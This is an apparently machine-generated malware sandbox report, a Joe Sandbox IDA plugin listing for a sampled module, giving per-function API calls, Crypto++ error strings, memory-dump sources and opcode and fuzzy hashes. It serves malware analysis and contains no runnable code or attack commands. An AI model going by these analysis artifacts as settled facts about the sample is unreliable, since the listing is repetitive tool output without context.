                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw$std::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
                                            • String ID:
                                            • API String ID: 921928366-0
                                            • Opcode ID: 8f88836abe50d849b76dd44f34443f3eb6dd9ce33507e24fd3b7baf25f667828
                                            • Instruction ID: 4bae71d60ed3143854f19dcdcde388aa160a0ba48610a190614b99af576e9d0a
                                            • Opcode Fuzzy Hash: 8f88836abe50d849b76dd44f34443f3eb6dd9ce33507e24fd3b7baf25f667828
                                            • Instruction Fuzzy Hash: 7A0144B9910608AFDB04DFA8DC559EF77FCAF64344F808159E819A7100EB71D604CBA6
                                            APIs
                                            • __getptd.LIBCMT ref: 689AF047
                                              • Part of subcall function 689AEAE6: __getptd_noexit.LIBCMT ref: 689AEAE9
                                              • Part of subcall function 689AEAE6: __amsg_exit.LIBCMT ref: 689AEAF6
                                            • __amsg_exit.LIBCMT ref: 689AF067
                                            • __lock.LIBCMT ref: 689AF077
                                            • InterlockedDecrement.KERNEL32(?), ref: 689AF094
                                            • InterlockedIncrement.KERNEL32(05BE1668), ref: 689AF0BF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                            • String ID:
                                            • API String ID: 4271482742-0
                                            • Opcode ID: 88360762229057c9dcd2e6c5262ac9edbb3bbce633a8b68a45b2d77d8f5b2ba0
                                            • Instruction ID: ae1572c4dba66c49034fdb8dfde8f2d7c9f3a49cedbce1577af0ab5d9790bd2e
                                            • Opcode Fuzzy Hash: 88360762229057c9dcd2e6c5262ac9edbb3bbce633a8b68a45b2d77d8f5b2ba0
                                            • Instruction Fuzzy Hash: C101B535946A31EBDB11EF64848876E7BA4FF06B1DF804005E835A7684CBB4E881CFD5
                                            APIs
                                            • __getptd.LIBCMT ref: 689AF7C8
                                              • Part of subcall function 689AEAE6: __getptd_noexit.LIBCMT ref: 689AEAE9
                                              • Part of subcall function 689AEAE6: __amsg_exit.LIBCMT ref: 689AEAF6
                                            • __getptd.LIBCMT ref: 689AF7DF
                                            • __amsg_exit.LIBCMT ref: 689AF7ED
                                            • __lock.LIBCMT ref: 689AF7FD
                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 689AF811
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                            • String ID:
                                            • API String ID: 938513278-0
                                            • Opcode ID: 8d7d790940840f06313ca6c255468b6c07578b2197dd15e92436dd2c4dd0af74
                                            • Instruction ID: f28091192cfe328df05f203b6eb9770267c02a76051fc701b0eec56ccd588c91
                                            • Opcode Fuzzy Hash: 8d7d790940840f06313ca6c255468b6c07578b2197dd15e92436dd2c4dd0af74
                                            • Instruction Fuzzy Hash: F7F0E936945B109FEB61ABB8C405B6E37E0BF1172CFE04549E864A72C0DFB4D540CB95
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memcpy_s
                                            • String ID:
                                            • API String ID: 2001391462-3916222277
                                            • Opcode ID: b0e4ae4170e3dc207db4239b1041dc103faf4e7d804b5d325ca24d464df28e09
                                            • Instruction ID: 7ee2c85628d45ce70117b0378e3965846ef3960a46c5f20be37dd689d39cba51
                                            • Opcode Fuzzy Hash: b0e4ae4170e3dc207db4239b1041dc103faf4e7d804b5d325ca24d464df28e09
                                            • Instruction Fuzzy Hash: 83C149B56083028FD704CE28C8A4A6EB7E5FFC9318F844E2DE5A5C7250E775E949CB42
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memcpy_s_memmove_memset
                                            • String ID: EncodingParameters
                                            • API String ID: 4034675494-55378216
                                            • Opcode ID: ade84167cb16dc3bff6986748592f0546792c9b8ee61005950870809ca290d19
                                            • Instruction ID: 256dcca048ef9a96807ad8494cdc98ec0ce1b1ea8ee76187e7c0a4ea38afbda2
                                            • Opcode Fuzzy Hash: ade84167cb16dc3bff6986748592f0546792c9b8ee61005950870809ca290d19
                                            • Instruction Fuzzy Hash: 369199B46483819FD304CF28C880B2BBBE9AFDA708F54492DF89997351D771E945CB92
                                            APIs
                                              • Part of subcall function 6899D820: _memmove.LIBCMT ref: 6899D930
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 689813D4
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                              • Part of subcall function 68978D80: _malloc.LIBCMT ref: 68978D8A
                                              • Part of subcall function 68978D80: _malloc.LIBCMT ref: 68978DAF
                                            Strings
                                            • : ciphertext length of , xrefs: 689812E4
                                            • for this key, xrefs: 68981348
                                            • doesn't match the required length of , xrefs: 68981316
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                            • String ID: doesn't match the required length of $ for this key$: ciphertext length of
                                            • API String ID: 1025790555-2559040249
                                            • Opcode ID: 469f757ab14a8a7731551ca7c2e293c04fa0c1df5f317f4ba58c13ce274b6263
                                            • Instruction ID: ff16f327672fe74d8126d30b2eee05e5f3fa3e42722c1bad05668c673719a9bd
                                            • Opcode Fuzzy Hash: 469f757ab14a8a7731551ca7c2e293c04fa0c1df5f317f4ba58c13ce274b6263
                                            • Instruction Fuzzy Hash: 6BA14CB55083809FD324CB69D880BABB7E9AFD9308F444A1DE19983351DB70E905CBA3
                                            APIs
                                            • __startOneArgErrorHandling.LIBCMT ref: 689AB50D
                                              • Part of subcall function 689B1AA0: __87except.LIBCMT ref: 689B1ADB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ErrorHandling__87except__start
                                            • String ID: pow
                                            • API String ID: 2905807303-2276729525
                                            • Opcode ID: 5d85b4563bd38264e96eced5a7a301e44c0050b0b250fc5f11b9c60ccd8b639e
                                            • Instruction ID: fe21153d3ef81d82ae030c66b90c9aaf570d26c9adfe873c0483adb0a4ea2cf2
                                            • Opcode Fuzzy Hash: 5d85b4563bd38264e96eced5a7a301e44c0050b0b250fc5f11b9c60ccd8b639e
                                            • Instruction Fuzzy Hash: 20513C71E4C209D6C701AA18C95436F7BFCDB83B59FD08D68E4F542298EB36C8948A4A
                                            APIs
                                            • __cftoe.LIBCMT ref: 689588ED
                                              • Part of subcall function 689AA116: __mbstowcs_s_l.LIBCMT ref: 689AA12C
                                            • __cftoe.LIBCMT ref: 68958911
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: __cftoe$__mbstowcs_s_l
                                            • String ID: zX$P
                                            • API String ID: 1494777130-2079734279
                                            • Opcode ID: cbab2d483bc9a83bbef52f307b85c3b50a283249fd9c9f17cb041faf9d17e498
                                            • Instruction ID: 34a9f1ec837fa466cf4cba0b86f282b0c5d1c490554fb6e3dd5a752fda0ab15c
                                            • Opcode Fuzzy Hash: cbab2d483bc9a83bbef52f307b85c3b50a283249fd9c9f17cb041faf9d17e498
                                            • Instruction Fuzzy Hash: D49101B11187819FC376CF14C884BAFBBE8BB88714F904A1DE19D5B280DB719645CF92
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 68978ABB
                                            • __CxxThrowException@8.LIBCMT ref: 68978B82
                                            Strings
                                            • : invalid ciphertext, xrefs: 68978B48
                                            • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 68978A8E
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
                                            • API String ID: 2005118841-483996327
                                            • Opcode ID: 00fe436a94d3a144b1589f0322114a837fb0a01c452a91ddcbbbe19eda03d270
                                            • Instruction ID: d6dfc147a234f49c2c64a7b4288a1f29962b4e624b8a1a818e44f4125c19f826
                                            • Opcode Fuzzy Hash: 00fe436a94d3a144b1589f0322114a837fb0a01c452a91ddcbbbe19eda03d270
                                            • Instruction Fuzzy Hash: 30512AB51047409FD334CF64C990EABB7E8EBD8708F408A1DE99A97641DB31E909CB66
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memset$Exception@8Throw
                                            • String ID: Aj?Q
                                            • API String ID: 1984186933-52356588
                                            • Opcode ID: a19f1ad3caa879b1e5641cf97e626ca20c8cbfd3862f662b349809f49c54c229
                                            • Instruction ID: 986ae95bc27048f7039760ca38966b34a0842b23127cf5408c5e87b9ec9dfa4b
                                            • Opcode Fuzzy Hash: a19f1ad3caa879b1e5641cf97e626ca20c8cbfd3862f662b349809f49c54c229
                                            • Instruction Fuzzy Hash: 0C518F756043059FDB14CF28C884B6BB3E9FF98718F888A2DE86587741EB74E9048B91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: _memcpy_s$_memset
                                            • String ID: Aj?Q
                                            • API String ID: 834817721-52356588
                                            • Opcode ID: 9421b331fe0b739997188cf0d4348d7aac7240a3782b03e9462be969682954e6
                                            • Instruction ID: 2078f2e515bb8e9b7de1e3398a1eb43aeac188bab758bb40062a223d1d07c2f2
                                            • Opcode Fuzzy Hash: 9421b331fe0b739997188cf0d4348d7aac7240a3782b03e9462be969682954e6
                                            • Instruction Fuzzy Hash: 12517175A00601AFDB14CF18C894E6AB7AAFFC4314F19C61DE96687700DB30F955CB91
                                            APIs
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68944EFC
                                            • std::_Xinvalid_argument.LIBCPMT ref: 68944F16
                                            • _memmove.LIBCMT ref: 68944F6C
                                              • Part of subcall function 68944D90: std::_Xinvalid_argument.LIBCPMT ref: 68944DA9
                                              • Part of subcall function 68944D90: std::_Xinvalid_argument.LIBCPMT ref: 68944DCA
                                              • Part of subcall function 68944D90: std::_Xinvalid_argument.LIBCPMT ref: 68944DE5
                                              • Part of subcall function 68944D90: _memmove.LIBCMT ref: 68944E4D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Xinvalid_argumentstd::_$_memmove
                                            • String ID: string too long
                                            • API String ID: 2168136238-2556327735
                                            • Opcode ID: e80069873f274276049bbc4a1defd44ffc6c81e34d859bbe8c61789cbe34b7d7
                                            • Instruction ID: 3cba1b4c41b27a256ae5f69f7caf5e1881684470b2266bd0924cd4a358efb300
                                            • Opcode Fuzzy Hash: e80069873f274276049bbc4a1defd44ffc6c81e34d859bbe8c61789cbe34b7d7
                                            • Instruction Fuzzy Hash: 213129327122104BD7349E5CE48097FF7EAEFE17247A0452FE0668B640D771D8828BA1
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 68941DC9
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 68944067
                                              • Part of subcall function 68944010: _memmove.LIBCMT ref: 689440C8
                                            • __CxxThrowException@8.LIBCMT ref: 68941E74
                                            Strings
                                            • CryptoMaterial: this object contains invalid values, xrefs: 68941E16
                                            • BufferedTransformation: this object is not attachable, xrefs: 68941D67
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                            • String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
                                            • API String ID: 1902190269-3853263434
                                            • Opcode ID: 0b9274d2e4126a571172e8cac9a34a30d47e7143a7e5bc01afaa197451200e6b
                                            • Instruction ID: 6432ccc391dd4d05fa9e276b6922c672fd5a1167771dd599c408d8f0311cfcd0
                                            • Opcode Fuzzy Hash: 0b9274d2e4126a571172e8cac9a34a30d47e7143a7e5bc01afaa197451200e6b
                                            • Instruction Fuzzy Hash: 9A413D74C44248AFDB10DFE9D890AEEFBB8FF19314F50825AE42567290DB759604CF51
                                            APIs
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 6894402A
                                            • __CxxThrowException@8.LIBCMT ref: 6894194F
                                              • Part of subcall function 689AAC75: RaiseException.KERNEL32(?,?,689A9C34,513F6A41,?,?,?,?,689A9C34,513F6A41,689D9C90,689EB974,513F6A41), ref: 689AACB7
                                            • std::exception::exception.LIBCMT ref: 6894198E
                                              • Part of subcall function 689A95C1: std::exception::operator=.LIBCMT ref: 689A95DA
                                              • Part of subcall function 68944010: std::_Xinvalid_argument.LIBCPMT ref: 68944067
                                              • Part of subcall function 68944010: _memmove.LIBCMT ref: 689440C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
